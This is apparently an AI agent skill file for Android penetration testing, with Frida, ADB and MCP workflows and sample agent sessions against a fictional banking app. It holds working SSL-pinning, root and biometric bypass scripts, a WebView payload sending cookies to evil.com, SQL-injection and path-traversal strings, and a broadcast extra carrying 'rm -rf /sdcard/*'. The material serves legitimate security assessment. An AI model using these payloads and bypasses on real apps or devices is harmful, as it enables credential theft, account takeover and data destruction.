hardw00t

android-pentest

# Install this skill:
```shell
npx skills add hardw00t/ai-security-arsenal --skill "android-pentest"
```

Install specific skill from multi-skill repository

# Description

Comprehensive Android mobile application penetration testing skill with full ADB shell access to rooted devices. This skill should be used when performing security assessments on Android applications including static analysis, dynamic analysis, runtime manipulation, traffic interception, and vulnerability identification. Triggers on requests to pentest Android apps, test mobile security, analyze APKs, bypass security controls, or perform OWASP Mobile Top 10 assessments. (user)

# SKILL.md


---
name: android-pentest
description: "Comprehensive Android mobile application penetration testing skill with full ADB shell access to rooted devices. This skill should be used when performing security assessments on Android applications including static analysis, dynamic analysis, runtime manipulation, traffic interception, and vulnerability identification. Triggers on requests to pentest Android apps, test mobile security, analyze APKs, bypass security controls, or perform OWASP Mobile Top 10 assessments. (user)"
---

# Android Mobile Application Penetration Testing

This skill enables comprehensive security testing of Android applications through ADB shell access to a rooted Android device and the Android Dynamic MCP server. It covers the full OWASP MASTG methodology from reconnaissance to exploitation and reporting.

## When to Use This Skill

This skill should be invoked when:
- Starting a new Android application security assessment
- Performing dynamic analysis on Android apps
- Bypassing security controls (SSL pinning, root detection, anti-tampering)
- Extracting and analyzing application data
- Testing authentication and authorization mechanisms
- Analyzing network communications
- Fuzzing application components (activities, services, content providers, broadcast receivers)
- Performing OWASP MASTG compliance testing
- Writing penetration test reports

### Trigger Phrases

- "pentest this Android app"
- "security test the APK"
- "bypass SSL pinning on [app]"
- "extract data from [app]"
- "test Android authentication"
- "fuzz Android intents"
- "MASTG testing for [app]"
- "mobile app security assessment"

## Prerequisites

### Required Tools

| Tool | Purpose | Installation |
|------|---------|--------------|
| ADB | Device communication | `apt install adb` or Android SDK |
| Frida | Dynamic instrumentation | `pip install frida-tools` |
| Objection | Mobile exploration | `pip install objection` |
| apktool | APK decompilation | `apt install apktool` |
| jadx | Java decompilation | Download from GitHub |
| Burp Suite | Traffic interception | Download from PortSwigger |
| Android Studio | Emulator/tools | Download from Google |

### MCP Server Setup

The Android Dynamic MCP server provides comprehensive tooling. Ensure it's configured:

```json
// ~/.claude/mcp.json
{
  "mcpServers": {
    "android-pentest": {
      "command": "python",
      "args": ["/path/to/android-dynamic/server.py"]
    }
  }
}
```

### Mobile MCP for Device Interaction

For advanced device, emulator, and simulator interactions, use Mobile MCP:
- Repository: https://github.com/mobile-next/mobile-mcp
- Purpose: Provides MCP-based interaction with Android emulators and physical devices
- Features: Screen capture, touch automation, app lifecycle management, and UI inspection

```json
// Add to ~/.claude/mcp.json
{
  "mcpServers": {
    "mobile-mcp": {
      "command": "npx",
      "args": ["-y", "@anthropic/mobile-mcp", "--android"]
    }
  }
}
```

This complements Frida/Objection for scenarios requiring direct device UI interaction.

## Device Setup

### Physical Device

```shell
# 1. Enable Developer Options (tap Build Number 7 times)
# 2. Enable USB Debugging
# 3. Root device (Magisk recommended)

# Install Frida server
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell "su -c '/data/local/tmp/frida-server -D &'"
```

### Emulator

```shell
# Use Android Studio emulator with Google APIs (not Play Store)
# Root with rootAVD or system image without Google Play
# Match Frida server architecture (x86_64 for most emulators)
```

### Verification

```shell
# Verify ADB connection
adb devices

# Verify root access
adb shell su -c "id"

# Verify Frida connection
frida-ps -U

# Test MCP server
# In Claude Code: get_app_info("com.android.settings")
```

## Quick Start Guide

### 1. Initial Setup (2 minutes)

```text
User: I need to pentest the app com.example.targetapp

Claude: I'll set up the testing environment.

[MCP Tool Sequence]
1. get_app_info("com.example.targetapp")
   → Version, permissions, SDK levels, signatures

2. pull_apk("com.example.targetapp")
   → Extract APK for static analysis

3. list_exported_components("com.example.targetapp")
   → Map attack surface (activities, services, providers, receivers)
```

### 2. Bypass Security Controls (1 minute)

```text
[MCP Tool Sequence]
1. frida_spawn("com.example.targetapp")
   → PID: 12345

2. frida_bypass_ssl(12345)
   → SSL pinning disabled

3. frida_bypass_root(12345)
   → Root detection bypassed

4. setup_proxy("device-id", "192.168.1.100", 8080)
   → Traffic interception ready
```

### 3. Dynamic Analysis

```text
[MCP Tool Sequence]
1. frida_run_script(12345, "crypto_hooks.js")
2. frida_run_script(12345, "credential_hooks.js")
3. frida_run_script(12345, "intent_monitor.js")
4. get_logcat("com.example.targetapp")
```

### 4. Data Extraction

```text
[MCP Tool Sequence]
1. dump_databases("com.example.targetapp")
2. dump_shared_prefs("com.example.targetapp")
3. dump_internal_storage("com.example.targetapp")
4. dump_external_storage("com.example.targetapp")
```

## Methodology Reference

| Document | Coverage |
|----------|----------|
| methodology/recon.md | Information gathering, attack surface mapping |
| methodology/static_analysis.md | APK analysis, code review, secrets detection |
| methodology/dynamic_analysis.md | Runtime testing, hooking, instrumentation |
| methodology/network_testing.md | Traffic analysis, API testing, TLS verification |
| methodology/data_storage.md | Local storage, databases, file permissions |
| methodology/crypto_testing.md | Encryption analysis, key management |
| methodology/auth_testing.md | Authentication, session management, biometrics |
| methodology/client_side_injection.md | WebViews, deep links, content providers |

## Common Workflows with MCP Tool Sequences

### Workflow 1: Complete Application Assessment

```python
# Phase 1: Reconnaissance
get_app_info("com.target.app")
pull_apk("com.target.app")
list_exported_components("com.target.app")

# Phase 2: Bypass Protections
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
frida_bypass_root(pid)
setup_proxy(device_id, "192.168.1.100", 8080)

# Phase 3: Dynamic Analysis
frida_run_script(pid, "crypto_hooks.js")
frida_run_script(pid, "credential_hooks.js")
frida_run_script(pid, "intent_monitor.js")

# Phase 4: Data Extraction
dump_databases("com.target.app")
dump_shared_prefs("com.target.app")
dump_internal_storage("com.target.app")

# Phase 5: Component Testing
launch_activity("com.target.app", ".DeepLinkActivity",
                extras={"url": "javascript:alert(1)"})
query_content_provider("content://com.target.app.provider/users")
fuzz_intent_extra("com.target.app", ".ProcessActivity",
                  "data", ["../../../etc/passwd", "' OR '1'='1"])

# Phase 6: Network Testing
capture_traffic_start("com.target.app")
# [interact with app]
capture_traffic_stop()
```

### Workflow 2: SSL Pinning Bypass

```python
# Method 1: Universal Frida bypass (most apps)
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)

# Method 2: Custom script for specific library
frida_run_script(pid, """
Java.perform(function() {
    var CustomPinner = Java.use('com.target.app.security.Pinner');
    CustomPinner.verify.implementation = function() {
        console.log('[+] Bypassed custom pinner');
        return true;
    };
});
""")

# Method 3: If app uses flutter_ssl_pinning
frida_run_script(pid, """
var flutter = Process.findModuleByName("libflutter.so");
Interceptor.attach(Module.findExportByName("libssl.so", "SSL_CTX_set_custom_verify"), {
    onEnter: function(args) {
        args[2] = new NativeCallback(function() { return 0; }, 'int', ['pointer', 'pointer']);
    }
});
""")
```

### Workflow 3: Authentication Testing

```python
# Hook authentication methods
frida_hook_method(pid, "com.target.app.auth.AuthService", "login")
frida_hook_method(pid, "com.target.app.auth.TokenValidator", "validateToken")

# Biometric bypass
frida_run_script(pid, "biometric_bypass.js")

# Credential monitoring
frida_run_script(pid, "credential_hooks.js")

# Session manipulation
frida_hook_method(pid, "com.target.app.session.SessionManager", "*")
```

### Workflow 4: Component Testing

```python
# Map attack surface
components = list_exported_components("com.target.app")

# Test deep links
launch_activity("com.target.app", ".DeepLinkActivity",
                data_uri="targetapp://transfer?amount=1000&to=attacker")

# XSS in WebView
launch_activity("com.target.app", ".WebViewActivity",
                extras={"url": "javascript:document.location='http://evil.com/?c='+document.cookie"})

# Path traversal in file handling
fuzz_intent_extra("com.target.app", ".FileActivity", "filepath", [
    "../../../data/data/com.other.app/databases/secrets.db",
    "file:///data/local/tmp/evil.html",
    "content://com.target.app.provider/../../../etc/passwd"
])

# Content provider SQL injection
query_content_provider("content://com.target.app.provider/users?id=1' OR '1'='1' --")

# Broadcast injection
send_broadcast("com.target.app.CUSTOM_ACTION",
               extras={"command": "; rm -rf /sdcard/*"})
```

### Workflow 5: Cryptography Analysis

```python
# Hook all crypto operations
frida_run_script(pid, "crypto_hooks.js")

# Detect weak algorithms
frida_run_script(pid, """
Java.perform(function() {
    var Cipher = Java.use('javax.crypto.Cipher');
    Cipher.getInstance.overload('java.lang.String').implementation = function(algo) {
        console.log('[CRYPTO] Algorithm: ' + algo);
        if (algo.indexOf('ECB') !== -1) console.log('[!] WEAK: ECB mode');
        if (algo.indexOf('DES') !== -1) console.log('[!] WEAK: DES');
        if (algo.indexOf('RC4') !== -1) console.log('[!] WEAK: RC4');
        return this.getInstance(algo);
    };
});
""")

# Search for hardcoded keys
frida_memory_search(pid, "-----BEGIN RSA PRIVATE KEY-----")
frida_memory_search(pid, "AES_SECRET_KEY")

# Dump encryption keys at runtime
frida_hook_method(pid, "javax.crypto.spec.SecretKeySpec", "$init")
```
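As an added example (not from the skill or its bundled scripts): the `Cipher.getInstance` hook above only string-matches for ECB, DES and RC4, so a bare `AES` transformation, which the JCA resolves to `AES/ECB/PKCS5Padding`, slips through, while `RSA/ECB/PKCS1Padding` is flagged as ECB although that is only a JCA naming quirk. The classifier below parses the transformation strings such a hook logs and tags them; it is plain JavaScript that runs under node and can be pasted into a Frida script. The tag names and the sample log are my own construction.

```javascript
// Added example: classify JCA transformation strings as logged by a
// Cipher.getInstance() hook. Assumes the JCA rule that a bare symmetric
// name ("AES") means ECB mode with PKCS5 padding; for RSA the default
// padding is provider specific, so it is reported rather than guessed.

const WEAK_ALGORITHMS = new Set(['DES', 'DESEDE', 'RC4', 'ARCFOUR', 'RC2', 'BLOWFISH']);
const UNAUTHENTICATED_MODES = new Set(['CBC', 'CTR', 'OFB', 'CFB']);

// Split "ALG/MODE/PADDING" into parts, filling in the JCA defaults (case-insensitive).
function parseTransformation(transformation) {
  const parts = String(transformation).trim().split('/').map((p) => p.toUpperCase());
  const algorithm = parts[0];
  const implicit = parts.length === 1;
  if (algorithm === 'RSA') {
    return { algorithm, mode: parts[1] || 'NONE', padding: parts[2] || 'DEFAULT', implicit };
  }
  return { algorithm, mode: parts[1] || 'ECB', padding: parts[2] || 'PKCS5PADDING', implicit };
}

// Return the weakness tags (constructed names) for one transformation string.
function assessTransformation(transformation) {
  const t = parseTransformation(transformation);
  const findings = [];
  if (WEAK_ALGORITHMS.has(t.algorithm)) findings.push('WEAK_ALGORITHM:' + t.algorithm);
  if (t.algorithm === 'RSA') {
    // "RSA/ECB/..." is not block-mode ECB, so only the padding is examined.
    if (t.padding === 'NOPADDING') findings.push('RSA_NO_PADDING');
    if (t.padding === 'PKCS1PADDING') findings.push('RSA_PKCS1_V15_PADDING');
    if (t.padding === 'DEFAULT') findings.push('RSA_PROVIDER_DEFAULT_PADDING');
  } else if (t.mode === 'ECB') {
    // Bare "AES" is the case a plain indexOf('ECB') check misses.
    findings.push(t.implicit ? 'IMPLICIT_ECB' : 'ECB_MODE');
  } else if (UNAUTHENTICATED_MODES.has(t.mode)) {
    // Confidentiality-only modes: no integrity unless a MAC is added separately.
    findings.push('UNAUTHENTICATED_MODE:' + t.mode);
  }
  return { transformation, ...t, findings };
}

// Summarise a batch of logged strings: one entry per distinct transformation
// that produced at least one finding.
function summarizeTransformations(seen) {
  const out = new Map();
  for (const s of seen) {
    if (!out.has(s)) out.set(s, assessTransformation(s));
  }
  return [...out.values()].filter((r) => r.findings.length > 0);
}

// Constructed sample of what a crypto hook might log during one session.
const SAMPLE_LOG = ['AES', 'AES/GCM/NoPadding', 'DES/CBC/PKCS5Padding',
                    'RSA/ECB/PKCS1Padding', 'aes/ecb/pkcs5padding', 'AES'];

for (const r of summarizeTransformations(SAMPLE_LOG)) {
  console.log(r.transformation + ' -> ' + r.findings.join(', '));
}
```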

### Workflow 6: Data Exfiltration Analysis

```python
# Full data dump
databases = dump_databases("com.target.app")
prefs = dump_shared_prefs("com.target.app")
internal = dump_internal_storage("com.target.app")
external = dump_external_storage("com.target.app")
logs = get_logcat("com.target.app")

# Analyze for sensitive data
# Look for: tokens, passwords, PII, financial data, session IDs

# Monitor data writes in real-time
frida_run_script(pid, """
Java.perform(function() {
    var SharedPrefs = Java.use('android.app.SharedPreferencesImpl$EditorImpl');
    SharedPrefs.putString.implementation = function(key, value) {
        console.log('[PREFS] ' + key + ' = ' + value);
        return this.putString(key, value);
    };
});
""")
```

## MCP Tool Reference

### Device Interaction

| Tool | Description | Example |
|------|-------------|---------|
| `get_screen_state()` | Current screen/UI elements | Finding clickable elements |
| `tap_element(x, y)` | Tap at coordinates | Automating login flow |
| `input_text(text)` | Type into focused field | Entering credentials |
| `press_key(keycode)` | Press key | BACK=4, HOME=3, ENTER=66 |
| `swipe(x1, y1, x2, y2)` | Swipe gesture | Scrolling, pattern unlock |
| `long_press(x, y)` | Long press | Context menus |

### Frida Instrumentation

| Tool | Description | Example |
|------|-------------|---------|
| `frida_spawn(package)` | Start with Frida | Initial attachment |
| `frida_attach(package)` | Attach to running | Already running app |
| `frida_run_script(pid, script)` | Run Frida script | Custom hooks |
| `frida_bypass_ssl(pid)` | Bypass SSL pinning | Enable interception |
| `frida_bypass_root(pid)` | Bypass root detection | Evade security |
| `frida_hook_method(pid, class, method)` | Hook method | Trace calls |
| `frida_trace_crypto(pid)` | Trace crypto | Key extraction |
| `frida_dump_credentials(pid)` | Dump credentials | Credential theft |
| `frida_enumerate_classes(pid, pattern)` | List classes | Class discovery |
| `frida_memory_search(pid, pattern)` | Search memory | Find secrets |

### Network Tools

| Tool | Description | Example |
|------|-------------|---------|
| `setup_proxy(device, host, port)` | Configure proxy | Burp interception |
| `clear_proxy(device)` | Remove proxy | Cleanup |
| `install_ca_cert(device, path)` | Install CA cert | Trust Burp CA |
| `capture_traffic_start(package)` | Start capture | Record traffic |
| `capture_traffic_stop()` | Stop capture | Save PCAP |

### Data Extraction

| Tool | Description | Example |
|------|-------------|---------|
| `dump_databases(package)` | Extract SQLite DBs | User data, creds |
| `dump_shared_prefs(package)` | Get preferences | Tokens, settings |
| `dump_internal_storage(package)` | Internal files | Config, certs |
| `dump_external_storage(package)` | SD card files | Exports, cache |
| `get_logcat(package)` | Filtered logs | Debug info leak |

### Component Testing

| Tool | Description | Example |
|------|-------------|---------|
| `list_exported_components(package)` | Map attack surface | Find entry points |
| `launch_activity(pkg, activity, extras)` | Start activity | Deep link test |
| `send_broadcast(action, extras)` | Send broadcast | Broadcast injection |
| `start_service(pkg, service, extras)` | Start service | Service abuse |
| `query_content_provider(uri)` | Query provider | Data leakage |
| `fuzz_intent_extra(pkg, comp, key, payloads)` | Fuzz intents | Find vulns |

### App Management

| Tool | Description | Example |
|------|-------------|---------|
| `install_apk(path)` | Install APK | Deploy test build |
| `uninstall_app(package)` | Remove app | Cleanup |
| `clear_app_data(package)` | Clear data | Fresh state |
| `get_app_info(package)` | App metadata | Permissions, SDK |
| `list_installed_apps()` | All packages | Discovery |
| `pull_apk(package)` | Extract APK | Static analysis |

## Frida Script Library

Pre-built scripts in the `/scripts/` directory:

| Script | Purpose |
|--------|---------|
| ssl_pinning_bypass.js | Universal SSL/TLS pinning bypass |
| root_bypass.js | Root detection bypass |
| crypto_hooks.js | Cryptographic operation monitoring |
| credential_hooks.js | Credential capture |
| network_hooks.js | Network traffic monitoring |
| biometric_bypass.js | Biometric authentication bypass |
| anti_tampering_bypass.js | Anti-tampering/debugger bypass |
| intent_monitor.js | Intent/IPC monitoring |
| webview_hooks.js | WebView security monitoring |
| dynamic_dex_hooks.js | Dynamic code loading detection |
| keystore_hooks.js | Android Keystore monitoring |
| method_tracer.js | Generic method tracing |

## Troubleshooting Guide

### Frida Issues

#### "Failed to spawn: unable to find application"

```shell
# Solution: Verify package name
list_installed_apps() | grep <partial_name>
adb shell pm list packages | grep <partial_name>
```

#### "Failed to attach: process not found"

```python
# Solution: App not running, use spawn instead
pid = frida_spawn("com.target.app")  # Instead of frida_attach
```

#### "Script terminated with error"

```python
# Solution: Class/method not found
frida_enumerate_classes(pid, "*TargetClass*")  # Find exact class
# Check for obfuscation - class names may be: a, b, c, etc.
```

#### Frida server crashes

```shell
# Solution: Version mismatch
frida --version  # Check client version
# Download matching server from https://github.com/frida/frida/releases
```

### SSL Pinning Issues

#### Universal bypass doesn't work

```text
# Solution: Custom pinning implementation
1. Decompile APK with jadx
2. Search: "certificate", "pin", "ssl", "trust"
3. Identify custom class and method
4. Write targeted Frida hook

# Check for: OkHttp CertificatePinner, custom TrustManager,
# native SSL verification, Network Security Config
```

#### App still fails after bypass

```text
# Solution: Multiple pinning layers
1. Check for native SSL verification (libssl.so)
2. Use anti_tampering_bypass.js for Frida detection bypass
3. Try objection: android sslpinning disable
4. Consider frida-gadget for persistent injection
```

### Root Detection Issues

#### App detects root and exits

```text
# Solution: Multiple detection vectors
1. Use comprehensive root_bypass.js
2. Enable Magisk Hide / Zygisk DenyList
3. Check for native root checks (hook fopen, access)
4. Consider frida-gadget embedded in APK
```

#### App detects Frida

```text
# Solution: Frida detection in place
1. Use anti_tampering_bypass.js first
2. Rename frida-server binary
3. Use frida-gadget instead
4. Hook pthread_create to hide Frida threads
```

### ADB Issues

#### "device unauthorized"

```shell
adb kill-server
adb start-server
# Accept prompt on device
```

#### "Permission denied" for data

```shell
adb root  # If using userdebug build
adb shell su -c "cat /data/data/<pkg>/..."  # With root
```

### Data Extraction Issues

#### Database is encrypted (SQLCipher)

```python
# Hook to capture password
frida_hook_method(pid, "net.sqlcipher.database.SQLiteDatabase", "openOrCreateDatabase")

# Or search memory for key
frida_memory_search(pid, "x]@1#%hJ")  # Common patterns
```

## Checklists Reference

| Checklist | Purpose |
|-----------|---------|
| checklists/owasp_mastg_full.md | Complete MASTG compliance |
| checklists/quick_wins.md | Fast vulnerability finding |
| checklists/pre_engagement.md | Setup verification |
| checklists/report_items.md | Report completeness |

## Templates Reference

| Template | Purpose |
|----------|---------|
| templates/finding_template.md | Individual finding docs |
| templates/executive_summary.md | Management summary |
| templates/technical_report.md | Full technical report |
| templates/remediation_guide.md | Developer fixes |

## Example Claude Code Interactions

### Example 1: Starting New Assessment

```text
User: I need to pentest com.megabank.mobile. It has SSL pinning and root detection.

Claude: I'll set up the testing environment for com.megabank.mobile.

[Executes MCP tools]

1. Getting app information:
   > get_app_info("com.megabank.mobile")

   Version: 3.2.1, Target SDK: 33, Min SDK: 26
   Permissions: INTERNET, CAMERA, BIOMETRIC, READ_CONTACTS...

2. Extracting APK:
   > pull_apk("com.megabank.mobile")

   Saved to: /tmp/com.megabank.mobile.apk

3. Mapping attack surface:
   > list_exported_components("com.megabank.mobile")

   Exported Activities:
   - com.megabank.mobile.DeepLinkActivity (intent-filter: megabank://)
   - com.megabank.mobile.ShareReceiveActivity

   Content Providers:
   - com.megabank.mobile.provider.DocumentProvider (exported)

   Broadcast Receivers:
   - com.megabank.mobile.PushReceiver

4. Starting with Frida and bypassing protections:
   > frida_spawn("com.megabank.mobile")
   PID: 12345

   > frida_bypass_ssl(12345)
   [+] SSL pinning bypass active - hooked 8 methods

   > frida_bypass_root(12345)
   [+] Root detection bypass active

5. Configuring traffic interception:
   > setup_proxy("emulator-5554", "192.168.1.100", 8080)
   [+] Proxy configured

Environment ready. I've identified 3 potential entry points for testing:
1. Deep link handler (megabank://) - test for URL scheme hijacking
2. DocumentProvider - test for path traversal
3. PushReceiver - test for broadcast injection

Would you like me to proceed with dynamic analysis or test specific components?
```

### Example 2: Data Storage Investigation

```text
User: Check what sensitive data this app stores locally

Claude: I'll perform comprehensive data storage analysis.

[Executes MCP tools]

1. SharedPreferences analysis:
   > dump_shared_prefs("com.megabank.mobile")

   [!] FINDING in auth_prefs.xml:
   - auth_token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
   - refresh_token: "dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4..."
   - pin_hash: "5e884898da28047d9166..."

   Severity: HIGH - Authentication tokens stored in plaintext
   MASTG: MASTG-TEST-0001 (Insecure Data Storage)

2. Database analysis:
   > dump_databases("com.megabank.mobile")

   Found: app_data.db (356 KB)

   [!] FINDING:
   - Table 'accounts': account_number, balance, last_transaction
   - Table 'transactions': 847 records with transaction history
   - Table 'cached_credentials': username, password_hash

   Severity: HIGH - Financial data in unencrypted database
   MASTG: MASTG-TEST-0001

3. Internal storage:
   > dump_internal_storage("com.megabank.mobile")

   [!] FINDING: /files/user_profile.json
   Contains: full_name, email, phone, ssn_last_4

   Severity: MEDIUM - PII in plaintext file

4. External storage:
   > dump_external_storage("com.megabank.mobile")

   [!] FINDING: /Android/data/com.megabank.mobile/files/exports/
   - statements_2024.pdf (world-readable)

   Severity: MEDIUM - Sensitive docs on external storage
   MASTG: MASTG-TEST-0003

Summary:
| Finding | Severity | MASTG ID |
|---------|----------|----------|
| Auth tokens in SharedPreferences | High | MASTG-TEST-0001 |
| Unencrypted SQLite database | High | MASTG-TEST-0001 |
| PII in plaintext files | Medium | MASTG-TEST-0002 |
| Docs on external storage | Medium | MASTG-TEST-0003 |
```

### Example 3: Authentication Bypass

```text
User: Test the authentication for vulnerabilities

Claude: I'll test authentication mechanisms comprehensively.

[Executes MCP tools]

1. Hooking authentication flow:
   > frida_run_script(12345, "credential_hooks.js")

   [HOOK] SharedPreferences write: auth_token = eyJ...
   [HOOK] HTTP Header: Authorization: Bearer eyJ...

2. Biometric testing:
   > frida_run_script(12345, "biometric_bypass.js")

   [HOOK] BiometricPrompt.authenticate() called
   [BYPASS] Simulating successful authentication

   [!] FINDING: Biometric bypass successful
   - App accepts fake biometric success callback
   - No server-side verification

   Severity: HIGH - Authentication bypass
   MASTG: MASTG-TEST-0015

3. Session analysis:
   > frida_hook_method(12345, "com.megabank.mobile.auth.SessionManager", "*")

   [HOOK] validateSession(): Only checks local JWT expiry
   [HOOK] refreshSession(): No server round-trip

   [!] FINDING: Client-side session validation
   - JWT expiry can be modified locally
   - Sessions never verified server-side

   Severity: HIGH - Broken session management
   MASTG: MASTG-TEST-0016

4. Token analysis:
   > frida_run_script(12345, """
   Java.perform(function() {
       var JWT = Java.use('com.auth0.jwt.JWT');
       JWT.decode.implementation = function(token) {
           console.log('[JWT] ' + token);
           return this.decode(token);
       };
   });
   """)

   [!] FINDING: JWT uses HS256 (weak algorithm)
   [!] FINDING: JWT contains: account_id, role, permissions

Findings Summary:
| Issue | Severity | Impact |
|-------|----------|--------|
| Biometric bypass | High | Full account access |
| Client-side sessions | High | Persistent unauthorized access |
| Weak JWT algorithm | Medium | Potential token forgery |
```
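As an added example serving Examples 2 and 3 above (not part of the skill or its scripts): a node script that triages a SharedPreferences XML file of the kind `dump_shared_prefs` pulls, parsing the `<map>` format Android writes, flagging values that look like JWTs (reporting the header `alg` without verifying the token) and keys whose names suggest credentials, so the "tokens in plaintext" and "JWT uses HS256" findings come from a repeatable check. The XML sample, the token inside it and the tag names are constructed for this example.

```javascript
// Added example: triage a dumped SharedPreferences XML file.
// Key words, tag names and the sample file are constructed, not from the skill.
const SENSITIVE_KEY_WORDS = ['token', 'password', 'passwd', 'secret', 'pin', 'ssn', 'session', 'apikey', 'api_key'];
const JWT_RE = /^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$/;

function b64url(s) {
  return Buffer.from(s, 'utf8').toString('base64').replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}

// Minimal parser for Android's <map> preference format: <string> elements carry
// their value as text, while int/long/float/boolean use a value="" attribute.
function parseSharedPrefs(xml) {
  const entries = [];
  const re = /<(string|int|long|float|boolean)\s+name="([^"]*)"(?:\s+value="([^"]*)")?\s*(?:\/>|>([\s\S]*?)<\/\1>)/g;
  let m;
  while ((m = re.exec(xml)) !== null) {
    entries.push({ type: m[1], key: m[2], value: m[3] !== undefined ? m[3] : (m[4] || '').trim() });
  }
  return entries;
}

// Decode only the JWT header (no signature check); returns null on garbage.
function jwtHeader(token) {
  try {
    const b64 = token.split('.')[0].replace(/-/g, '+').replace(/_/g, '/');
    return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
  } catch (e) {
    return null;
  }
}

// One entry -> list of tags: a stored JWT (with its alg) and/or a credential-like key name.
function assessEntry(entry) {
  const key = entry.key.toLowerCase();
  const findings = [];
  if (entry.type === 'string' && JWT_RE.test(entry.value)) {
    const hdr = jwtHeader(entry.value);
    findings.push('JWT_STORED' + (hdr && hdr.alg ? ':' + hdr.alg : ''));
    if (hdr && String(hdr.alg).toLowerCase() === 'none') findings.push('JWT_ALG_NONE');
  }
  if (entry.value !== '' && SENSITIVE_KEY_WORDS.some((w) => key.includes(w))) {
    findings.push('SENSITIVE_KEY_NAME');
  }
  return { key: entry.key, type: entry.type, findings };
}

function triageSharedPrefs(xml) {
  return parseSharedPrefs(xml).map(assessEntry).filter((r) => r.findings.length > 0);
}

// Constructed sample of what an auth_prefs.xml dump could look like.
const SAMPLE_JWT = b64url('{"alg":"HS256","typ":"JWT"}') + '.' + b64url('{"account_id":42,"role":"user"}') + '.c2ln';
const SAMPLE_PREFS = `<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="auth_token">${SAMPLE_JWT}</string>
    <string name="pin_hash">5e884898da28047d9166</string>
    <boolean name="biometric_enabled" value="true" />
    <int name="launch_count" value="12" />
    <string name="theme">dark</string>
</map>
`;

for (const r of triageSharedPrefs(SAMPLE_PREFS)) {
  console.log(r.key + ' -> ' + r.findings.join(', '));
}
```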


## Bundled Resources

### scripts/

- ssl_pinning_bypass.js - Universal SSL pinning bypass
- root_bypass.js - Root detection bypass
- crypto_hooks.js - Crypto operation monitoring
- keystore_hooks.js - Android Keystore hooks
- method_tracer.js - Generic method tracing
- extract_apk.py - APK extraction tool
- content_provider_scanner.py - Content provider enumeration
- intent_fuzzer.py - Intent fuzzing automation

### references/

- owasp_mobile_top10.md - OWASP Mobile Top 10
- android_security_checklist.md - Testing checklist
- frida_snippets.md - Common Frida code snippets

# Supported AI Coding Agents

This skill is compatible with the SKILL.md standard and works with all major AI coding agents.
